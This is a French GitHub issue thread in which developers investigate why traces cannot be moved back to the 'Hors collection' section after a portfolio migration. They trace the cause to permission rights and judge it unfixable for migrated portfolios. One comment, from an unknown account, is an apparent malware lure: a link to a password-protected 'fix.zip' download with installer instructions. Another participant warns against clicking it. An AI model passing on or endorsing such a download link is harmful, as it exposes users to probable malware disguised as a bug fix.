### ISSUE TITLE
Module Migration : Bug déplacer les traces vers hors collection

### ISSUE THREAD

**Issue by AdrienPrugnaud** [avenirs-esr/GT-Test#78]
On ne peut pas transférer des traces vers les "traces hors collection" (alors que l'on peut bien les transférer vers d'autres collections) :  

![trace](https://github.com/user-attachments/assets/0a00f873-9d32-47c6-935f-f464e83499a9)

@olivier-gerbe

**Comment by isabelle-roy** [comment]
Allo Adrien,

C'est très étrange, on n'a pas touché à ça dans KAPC 1.4 et je viens de tester sur notre serveur et je n'ai pas ce problème dans un portfolio migré. 
Comme je ne peux pas accéder à ton serveur, est-ce qu'on pourrait se voir en visio ?

ps. J'ai renommé ton issue pour bien identifier qu'on repart dans une série sur le module de migration... ça va m'aider à m'y retrouver.

Isabelle

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AdrienPrugnaud** [comment]
hello Isabelle, 
Tu peux y avoir accès cela sera plus simple (et ce sont des données réelles). De plus on n'utilise la version officielle dessus : 
_Bonjour Isabelle et Olivier.

J'ai mis à jour nos serveurs de test suivants avec les données de production:

https://test.recia.dev/recia-tours
https://test.recia.dev/recia-orleans

Autrement, en cas de besoin, je vous met mon collègue Nathan en copie qui pourra prendre le ralais si vous avez besoin de réinjecter à nouveau les données de production, indiquez lui simplement sur quel instance vous travaillez afin d'éviter qu'il regarde les deux bases et données de l'ensemble (du moins si vous ne travaillez que sur une instance).

Pour rappel, ces instances ne sont accessibles qu'au travers de votre VPN, j'ai injecté dans les bases vos comptes personnels via l'authentification CAS, ce qui vous permettra d'avoir un accès Admin. Merci de vérifier au plus vite si tout est fonctionnel pour vous. Au pire pour le VPN vous pouvez contacter mon collègue qui vous avait transmis les informations de configuration de vos VPN.

Bien cordialement,

Julien Gribonvald__

**Comment by AdrienPrugnaud** [comment]
Attention ne pas cliquer sur le lien de pngjian (on ne le connaît pas)

**Comment by olivier-gerbe** [comment]
Bonjour @adrien 
Je n'ai pas réussi à reproduire sur relia-tours.
Quel utilisateur utilises-tu ?

**Comment by AdrienPrugnaud** [comment]
Bonjour Olivier, je te donne les info par mail

**Comment by isabelle-roy** [comment]
@olivier-gerbe 
Allo Olivier, j'ai réussi à reproduire le problème sur le serveur de test après avoir migré les données de production d'Alice.
Tu peux te connecter avec isabelle.roy@gmail.com sur le serveur de test. J'ai pris des traces de la section Hors collection et je les ai mises dans une collection. Je ne suis pas capable de les remettre dans la section Hors collection : 
![image](https://github.com/user-attachments/assets/f738c411-f446-4db3-bffc-f5579daa27c0)
J'ai testé avec une trace créée dans 1.3.5 puis migrée et avec une trace créée dans 1.4.

**Comment by isabelle-roy** [comment]
@olivier-gerbe
Allo Olivier, j'ai réussi à reproduire le problème sur le serveur de test après avoir migré les données de production d'Alice.
Tu peux te connecter avec le compte étudiant [isabelle.roy@gmail.com](mailto:isabelle.roy@gmail.com) sur le serveur de test.
J'ai pris des traces de la section Hors collection et je les ai mises dans une collection.
Je ne suis pas capable de les remettre dans la section Hors collection.
Dans Network il y a une erreur HTTP 409.
J'ai testé avec une trace créée dans 1.3.5 puis migrée et avec une trace créée dans 1.4.


Info supplémentaire : ça fonctionne quand on est root, mais pas quand on est un utilisateur - donc problème de droits ? 
On vient de changer les droits parce que les traces sont visible par des intervenants à partir du porfolio projet de vie...
![image](https://github.com/user-attachments/assets/a603afca-bbcb-47f4-9a01-62fb4b3f4f63)

**Comment by olivier-gerbe** [comment]
Pas de solution possible. Il faut que l'étudiant ait le droit d'écrire dans la sous-section Hors collection. Mais on ne peut pas lui donner par batch.
De toute façon ce n'est pas trop grave, l'étudiant peut déplacer dans ses collections.

**Comment by AdrienPrugnaud** [comment]
Pas de possibilité de correction pour les portfolios migrés
